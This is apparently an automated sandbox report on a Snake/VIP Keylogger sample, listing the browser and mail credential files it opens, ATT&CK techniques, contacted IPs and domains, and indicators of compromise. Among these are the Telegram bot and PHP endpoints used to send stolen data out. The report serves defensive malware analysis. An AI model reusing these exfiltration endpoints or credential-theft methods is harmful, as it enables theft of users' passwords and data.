                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Snake Keylogger
                          Source: Yara matchFile source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
                          Yara detected VIP Keylogger
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          Query Registry                          		Remote Services1
                          Email Collection                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                          Virtualization/Sandbox Evasion                          		LSASS Memory1
                          Security Software Discovery                          		Remote Desktop Protocol11
                          Archive Collected Data                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Deobfuscate/Decode Files or Information                          		Security Account Manager1
                          Process Discovery                          		SMB/Windows Admin Shares1
                          Data from Local System                          		1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                          Obfuscated Files or Information                          		NTDS31
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput Capture3
                          Ingress Tool Transfer                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets1
                          Application Window Discovery                          		SSHKeylogging3
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                          System Network Configuration Discovery                          		VNCGUI Input Capture24
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Lpjrd6Wxad.exe68%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                          Lpjrd6Wxad.exe100%AviraHEUR/AGEN.1307591
                          Lpjrd6Wxad.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          us2.smtp.mailhostbox.com
                          		208.91.198.143
                          		truetrue
                            		unknown
                            reallyfreegeoip.org
                            		188.114.96.3
                            		truefalse
                              		high
                              api.telegram.org
                              		149.154.167.220
                              		truefalse
                                		high
                                checkip.dyndns.com
                                		193.122.130.0
                                		truefalse
                                  		high
                                  checkip.dyndns.org
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://checkip.dyndns.org/false
                                      		high
                                      https://reallyfreegeoip.org/xml/173.254.250.79false
                                        		high
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.office.com/Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabLpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.orgLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoLpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botLpjrd6Wxad.exefalse
                                                      		high
                                                      http://us2.smtp.mailhostbox.comLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.office.com/lBLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20aLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.orgLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://chrome.google.com/webstore?hl=enLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://varders.kozow.com:8081Lpjrd6Wxad.exefalse
                                                                          		high
                                                                          http://aborters.duckdns.org:8081Lpjrd6Wxad.exefalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.org/xml/173.254.250.79$Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://51.38.247.67:8081/_send_.php?LLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anotherarmy.dns.army:8081Lpjrd6Wxad.exefalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://checkip.dyndns.org/qLpjrd6Wxad.exefalse
                                                                                        		high
                                                                                        https://chrome.google.com/webstore?hl=enlBLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.orgLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedLpjrd6Wxad.exefalse
                                                                                                  		high
                                                                                                  https://reallyfreegeoip.org/xml/Lpjrd6Wxad.exefalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    208.91.198.143
                                                                                                    		us2.smtp.mailhostbox.comUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                    149.154.167.220
                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                    		62041TELEGRAMRUfalse
                                                                                                    188.114.96.3
                                                                                                    		reallyfreegeoip.orgEuropean Union
                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                    193.122.130.0
                                                                                                    		checkip.dyndns.comUnited States
                                                                                                    		31898ORACLE-BMC-31898USfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1551190
                                                                                                    Start date and time:2024-11-07 15:18:12 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 9s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:6
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Lpjrd6Wxad.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 65
                                                                                                    • Number of non-executed functions: 42
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • VT rate limit hit for: Lpjrd6Wxad.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    09:19:31API Interceptor9895537x Sleep call for process: Lpjrd6Wxad.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    208.91.198.143Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        149.154.167.220YqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          Nowe zam.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            188.114.96.3ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.rihanaroly.sbs/othk/
                                                                                                                                            Aviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • paste.ee/d/PAg0l
                                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • filetransfer.io/data-package/8shpYIj5/download
                                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • filetransfer.io/data-package/CXujY04Y/download
                                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • filetransfer.io/data-package/O2nyeCCn/download
                                                                                                                                            2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
                                                                                                                                            createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                            • paste.ee/d/PAg0l
                                                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • filetransfer.io/data-package/O7tfWEfj/download
                                                                                                                                            NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.timizoasisey.shop/agaq/
                                                                                                                                            https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • uniteseoul.com/

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            us2.smtp.mailhostbox.comREnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            reallyfreegeoip.orgQUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            z1NewPO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            8wNcTEYGQ4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            0Pk2HlsnGS.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            BG115Q39cY.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            YqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            Nowe zam.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            api.telegram.orgYqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Nowe zam.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            TELEGRAMRUYqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Nowe zam.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://berg.bergssrom.mom/fer.to.php.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.170.96
                                                                                                                                            FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PUBLIC-DOMAIN-REGISTRYUSw6dnPra4mx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                            • 162.251.80.30
                                                                                                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 119.18.54.39
                                                                                                                                            x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 103.21.58.10
                                                                                                                                            56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 119.18.54.27
                                                                                                                                            REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 119.18.54.27
                                                                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.115

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adQUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            z1NewPO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            8wNcTEYGQ4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            0Pk2HlsnGS.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            BG115Q39cY.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            YqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            Nowe zam.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
